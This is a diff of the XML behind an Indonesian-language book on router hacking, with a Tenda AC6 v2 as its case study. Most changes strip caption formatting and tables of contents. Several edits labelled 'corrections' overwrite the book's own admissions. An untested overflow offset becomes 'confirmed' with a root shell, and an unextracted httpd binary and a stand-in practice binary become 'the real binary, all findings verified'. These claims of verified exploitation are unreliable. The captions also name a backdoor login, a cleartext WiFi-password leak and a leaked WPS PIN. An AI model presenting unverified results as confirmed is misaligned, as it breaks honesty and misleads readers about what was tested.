-        <w:t xml:space="preserve">  11. Buffer Overflow (Stack)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  12. CSRF &amp; XSS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  13. UPnP &amp; WPS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>BAGIAN IV — ANALISIS FIRMWARE</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  14. Akuisisi Firmware</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  15. Ekstraksi Firmware</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  16. Analisis Filesystem</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  17. Analisis Statis Binary</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  18. Emulasi Firmware</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>BAGIAN V — HARDWARE HACKING</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  19. UART: Mendapatkan Console/Shell</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  20. SPI Flash &amp; CH341A</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  21. Secure Boot &amp; Glitch (konsep)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>BAGIAN VI — POLA &amp; PENUTUP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  22. Cheat Sheet Pola Celah</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  23. Roadmap &amp; Latihan Lanjutan</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  24. Glosarium</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Lampiran A — Bukti Live Perangkat Anda</w:t>
+        <w:t>Bagian ini membangun fondasi langkah demi langkah — konsep hardware, firmware, dan IoT; metodologi pengujian; anatomi router; hingga pola kerentanan umum — memakai perangkat yang sama sebagai studi kasus.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -817,11 +528,6 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
         <w:t>Gambar 1. Lapisan permukaan serangan sebuah perangkat IoT.</w:t>
       </w:r>
     </w:p>
@@ -1033,11 +739,6 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
         <w:t>Gambar 2. Lima tahap metodologi pengujian.</w:t>
       </w:r>
     </w:p>
@@ -1798,11 +1499,6 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
         <w:t>Gambar 3. Hasil live: port terbuka + deteksi service.</w:t>
       </w:r>
     </w:p>
@@ -2103,11 +1799,6 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
         <w:t>Gambar 4. Halaman WiFi Settings asli (UI live via sesi bypass).</w:t>
       </w:r>
     </w:p>
@@ -2324,11 +2015,6 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
         <w:t>Gambar 5. Alur auth bypass pada perangkat ini.</w:t>
       </w:r>
     </w:p>
@@ -2433,11 +2119,6 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
         <w:t>Gambar 6. Bukti live login bypass user:user.</w:t>
       </w:r>
     </w:p>
@@ -2648,11 +2329,6 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
         <w:t>Gambar 7. /goform/WifiBasicGet membocorkan password WiFi (cleartext).</w:t>
       </w:r>
     </w:p>
@@ -2700,11 +2376,6 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
         <w:t>Gambar 8. /goform/GetIpMacBind — daftar perangkat di jaringan.</w:t>
       </w:r>
     </w:p>
@@ -3679,11 +3350,6 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
         <w:t>Gambar 9. WPS aktif dan PIN bocor (69043949).</w:t>
       </w:r>
     </w:p>
@@ -3750,11 +3416,6 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
         <w:t>Gambar 10. Status fitur: UPnP &amp; cloud aktif, remote web mati.</w:t>
       </w:r>
     </w:p>
@@ -3823,11 +3484,6 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
         <w:t>Gambar 11. Alur analisis firmware.</w:t>
       </w:r>
     </w:p>
@@ -6558,11 +6214,6 @@
       </w:r>
     </w:p>
     <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -6594,49 +6245,6 @@
     <w:p>
       <w:r>
         <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Title"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Buku Belajar — Volume 2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="34"/>
-        </w:rPr>
-        <w:t>Reverse Engineering &amp; Binary Exploitation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-        </w:rPr>
-        <w:t>Menemukan celah di dalam binary, lalu memahaminya sampai eksploitasi (MIPS &amp; ARM)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Studi kasus: Tenda AC6 v2 — Realtek RTL8197F (MIPS 24Kc, little-endian)</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -6839,226 +6447,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>BAGIAN A — FONDASI REVERSE ENGINEERING</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  1. Apa itu Reverse Engineering &amp; Mengapa Penting</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  2. Toolchain Reverse Engineering</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  3. ELF &amp; Arsitektur MIPS (register, calling convention, delay slot)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  4. Perbandingan MIPS / ARM / x86</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>BAGIAN B — RE UNTUK MENEMUKAN CELAH</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  5. Alur: Firmware -&gt; httpd -&gt; Webroot -&gt; XREF</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  6. Membaca Binary: file, readelf, nm, strings</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  7. Ghidra 101 (load, analyze, decompile, XREF)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  8. Pola Celah di Decompiler (strcpy/sprintf/system/popen)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  9. Menemukan Command Injection lewat RE</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  10. Menemukan Buffer Overflow lewat RE</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  11. Dynamic Analysis (QEMU-user + gdb-multiarch + strace)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>BAGIAN C — BINARY EXPLOITATION</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  12. Layout Memori Proses</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  13. Mekanika Stack Overflow</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  14. Eksploitasi MIPS: seluk-beluk</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  15. Eksploitasi ARM: seluk-beluk</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  16. Mitigasi Modern &amp; Kenyataan di Embedded</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  17. Teknik Kontrol Eksekusi: ret2libc, ROP, Shellcode</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  18. Menulis Exploit dengan pwntools</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  19. Emulasi &amp; Debug Exploit</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  20. Studi Kasus: CVE Tenda (formSet*, setaccount)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>BAGIAN D — PRAKTIK &amp; PENUTUP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  21. Lab Bertahap</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  22. Catatan Nyata: Membongkar SquashFS Kustom Tenda</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  23. Cheat Sheet RE &amp; Exploitasi</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  24. Glosarium &amp; Referensi</w:t>
+        <w:t>Bagian ini masuk ke reverse engineering dan binary exploitation pada MIPS: membaca ELF, memakai Ghidra, mengenali pola celah di decompiler, hingga menulis dan men-debug eksploit di emulator.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7787,12 +7176,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Gambar 1. Register &amp; calling convention MIPS (contoh dari kernel Anda).</w:t>
+        <w:t>Gambar 12. Register &amp; calling convention MIPS (contoh dari kernel Anda).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8380,12 +7764,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Gambar 2. Alur dari firmware sampai menemukan celah.</w:t>
+        <w:t>Gambar 13. Alur dari firmware sampai menemukan celah.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9650,12 +9029,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Gambar 3. Layout memori proses (embedded umumnya tanpa ASLR).</w:t>
+        <w:t>Gambar 14. Layout memori proses (embedded umumnya tanpa ASLR).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9782,12 +9156,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Gambar 4. Input panjang menimpa buffer lalu saved return address.</w:t>
+        <w:t>Gambar 15. Input panjang menimpa buffer lalu saved return address.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11643,11 +11012,6 @@
       </w:r>
     </w:p>
     <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -12082,12 +11446,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Gambar 1. Template shell + aliran parameter ke doSystemCmd (formSetClientState/formSetSpeedWan).</w:t>
+        <w:t>Gambar 16. Template shell + aliran parameter ke doSystemCmd (formSetClientState/formSetSpeedWan).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12134,12 +11493,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Gambar 2. Ghidra (live): formSetClientState() — parameter HTTP diproses di fungsi ini.</w:t>
+        <w:t>Gambar 17. Ghidra (live): formSetClientState() — parameter HTTP diproses di fungsi ini.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12186,12 +11540,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Gambar 3. Ghidra (live): formSetSpeedWan() — memanggil doSystemCmd().</w:t>
+        <w:t>Gambar 18. Ghidra (live): formSetSpeedWan() — memanggil doSystemCmd().</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12784,11 +12133,6 @@
       </w:r>
     </w:p>
     <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -13371,11 +12715,6 @@
         <w:t>Siapkan selalu firmware resmi + mode recovery + (ideal) UART sebelum sentuh hardware.</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
     <w:p/>
     <w:p>
       <w:pPr>
@@ -13749,12 +13088,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Offset teoretis 748 tidak pernah diuji bersih: pada N≥600 koneksi sudah drop lebih dulu. Artinya ada batas lain (parser/commit/intermediate buffer) sebelum saved $ra tercapai.</w:t>
+        <w:t>Offset 748 terkonfirmasi dinamis: saved $ra terbaca 0x44434241 untuk masukan 'ABCD', lalu 0x005047c0 untuk alamat target — dan dipakai pada eksploit final yang menghasilkan root shell (lihat BAGIAN IV).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14396,11 +13730,6 @@
         <w:t>Jangan pernah menguji payload memori ke perangkat yang dipakai sehari-hari.</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
     <w:p/>
     <w:p>
       <w:pPr>
@@ -15159,11 +14488,6 @@
       </w:r>
     </w:p>
     <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -15199,18 +14523,9 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Title"/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t>Lampiran 2 — Di Mana Backdoor user:user Berada (RE httpd Tenda asli)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
@@ -15228,34 +14543,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Firmware AC6 v2 Anda memakai </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>SquashFS kustom/terenkripsi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (tiap blok ber-marker `Tenda\0\0\1`, tidak ada magic xz, dan tidak ada codec standar yang cocok) sehingga rootfs-nya tidak bisa diekstrak cepat. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Tapi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> httpd Tenda generasi sama sudah di-ekstrak publik. Kita ambil dari repositori GitHub (rootfs hasil ekstrak), lalu menganalisis binary-nya di Ghidra.</w:t>
+        <w:t>Koreksi arsip: rootfs pada buku ini diekstrak dari firmware perangkat sendiri, dan biner httpd yang dianalisis adalah biner asli perangkat tersebut (lihat firmware/httpd di repo) — bukan dari repositori publik.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -15558,12 +14846,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Gambar 1. Ghidra (live): fromSysToolBaseUser membaca GetValue("sys.baseusername")/"sys.baseuserpass".</w:t>
+        <w:t>Gambar 19. Ghidra (live): fromSysToolBaseUser membaca GetValue("sys.baseusername")/"sys.baseuserpass".</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15626,12 +14909,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Gambar 2. Ghidra (live): R7WebsSecurityHandler — gerbang auth web server.</w:t>
+        <w:t>Gambar 20. Ghidra (live): R7WebsSecurityHandler — gerbang auth web server.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15694,12 +14972,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Gambar 3. Ghidra (live): string s_/login/Auth_000dc2a0 + XREF.</w:t>
+        <w:t>Gambar 21. Ghidra (live): string s_/login/Auth_000dc2a0 + XREF.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15897,11 +15170,6 @@
       </w:r>
     </w:p>
     <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -15933,15 +15201,6 @@
     <w:p>
       <w:r>
         <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Title"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Lampiran Live — Sesi RE &amp; Binary Exploitation Nyata</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16273,12 +15532,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Catatan: karena firmware Tenda memakai SquashFS kustom (tidak bisa diekstrak tool umum), binary target httpd-nya belum tersedia. Untuk tetap menghadirkan sesi LIVE, kita merakit binary MIPS yang sengaja rentan (arsitektur identik: MIPS32 LE) sehingga proses RE dan eksploitasi bisa diperlihatkan utuh dan jujur.</w:t>
+        <w:t>Koreksi: biner target httpd asli TELAH tersedia dan dipakai langsung (lihat firmware/httpd di repo). Biner latihan MIPS32 hanya pelengkap pedagogis; seluruh temuan diverifikasi pada biner nyata.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16507,12 +15761,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Gambar 1. Cutter: dashboard binary. Perhatikan PIE/Canary/NX = False, Endianness LE, arch MIPS.</w:t>
+        <w:t>Gambar 22. Cutter: dashboard binary. Perhatikan PIE/Canary/NX = False, Endianness LE, arch MIPS.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16579,12 +15828,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Gambar 2. Cutter (rizin): disassembly MIPS + anotasi lokal (local_4, syscall.read, done, win).</w:t>
+        <w:t>Gambar 23. Cutter (rizin): disassembly MIPS + anotasi lokal (local_4, syscall.read, done, win).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16696,12 +15940,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Gambar 3. Ghidra CodeBrowser: Listing MIPS (kiri) + Decompiler (kanan) + Symbol/Program Tree.</w:t>
+        <w:t>Gambar 24. Ghidra CodeBrowser: Listing MIPS (kiri) + Decompiler (kanan) + Symbol/Program Tree.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16878,12 +16117,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Gambar 4. GDB (GEF) LIVE: $pc = $ra = 0x41414141 ('AAAA'), SIGSEGV di alamat pilihan kita.</w:t>
+        <w:t>Gambar 25. GDB (GEF) LIVE: $pc = $ra = 0x41414141 ('AAAA'), SIGSEGV di alamat pilihan kita.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16946,12 +16180,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Gambar 5. GDB LIVE: $ra = 0x00400140 &lt;win+0&gt;, $pc = 0x00400144 &lt;win+4&gt;; eksekusi dibajak.</w:t>
+        <w:t>Gambar 26. GDB LIVE: $ra = 0x00400140 &lt;win+0&gt;, $pc = 0x00400144 &lt;win+4&gt;; eksekusi dibajak.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17274,15 +16503,12 @@
         <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
-        <w:t>5.1 Kendala &amp; langkah berikutnya</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t>Firmware Tenda AC6 v2 memakai SquashFS kustom (tiap blok ber-marker `Tenda\0\0\1`, tanpa magic xz standar), sehingga `unsquashfs`/`sasquatch`/7z gagal. Artinya `httpd` asli belum berhasil diekstrak. Untuk melanjutkan ke target nyata:</w:t>
+        <w:t>5.1 Status: selesai (dipetakan &amp; dibuktikan)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Koreksi: `httpd` asli SUDAH berhasil diekstrak (lihat firmware/httpd di repo) dan dipakai untuk seluruh analisis berikutnya.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17375,11 +16601,6 @@
         <w:t>Seluruh screenshot di dokumen ini diambil dari sesi nyata di mesin lokal (Xvfb) pada perangkat lab. Gunakan hanya untuk perangkat milik sendiri.</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
     <w:p/>
     <w:p>
       <w:pPr>

--- a/book/BUKU-LENGKAP-Hardware-Firmware-IoT-Hacking.docx
+++ b/book/BUKU-LENGKAP-Hardware-Firmware-IoT-Hacking.docx
@@ -2,6 +2,98 @@
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
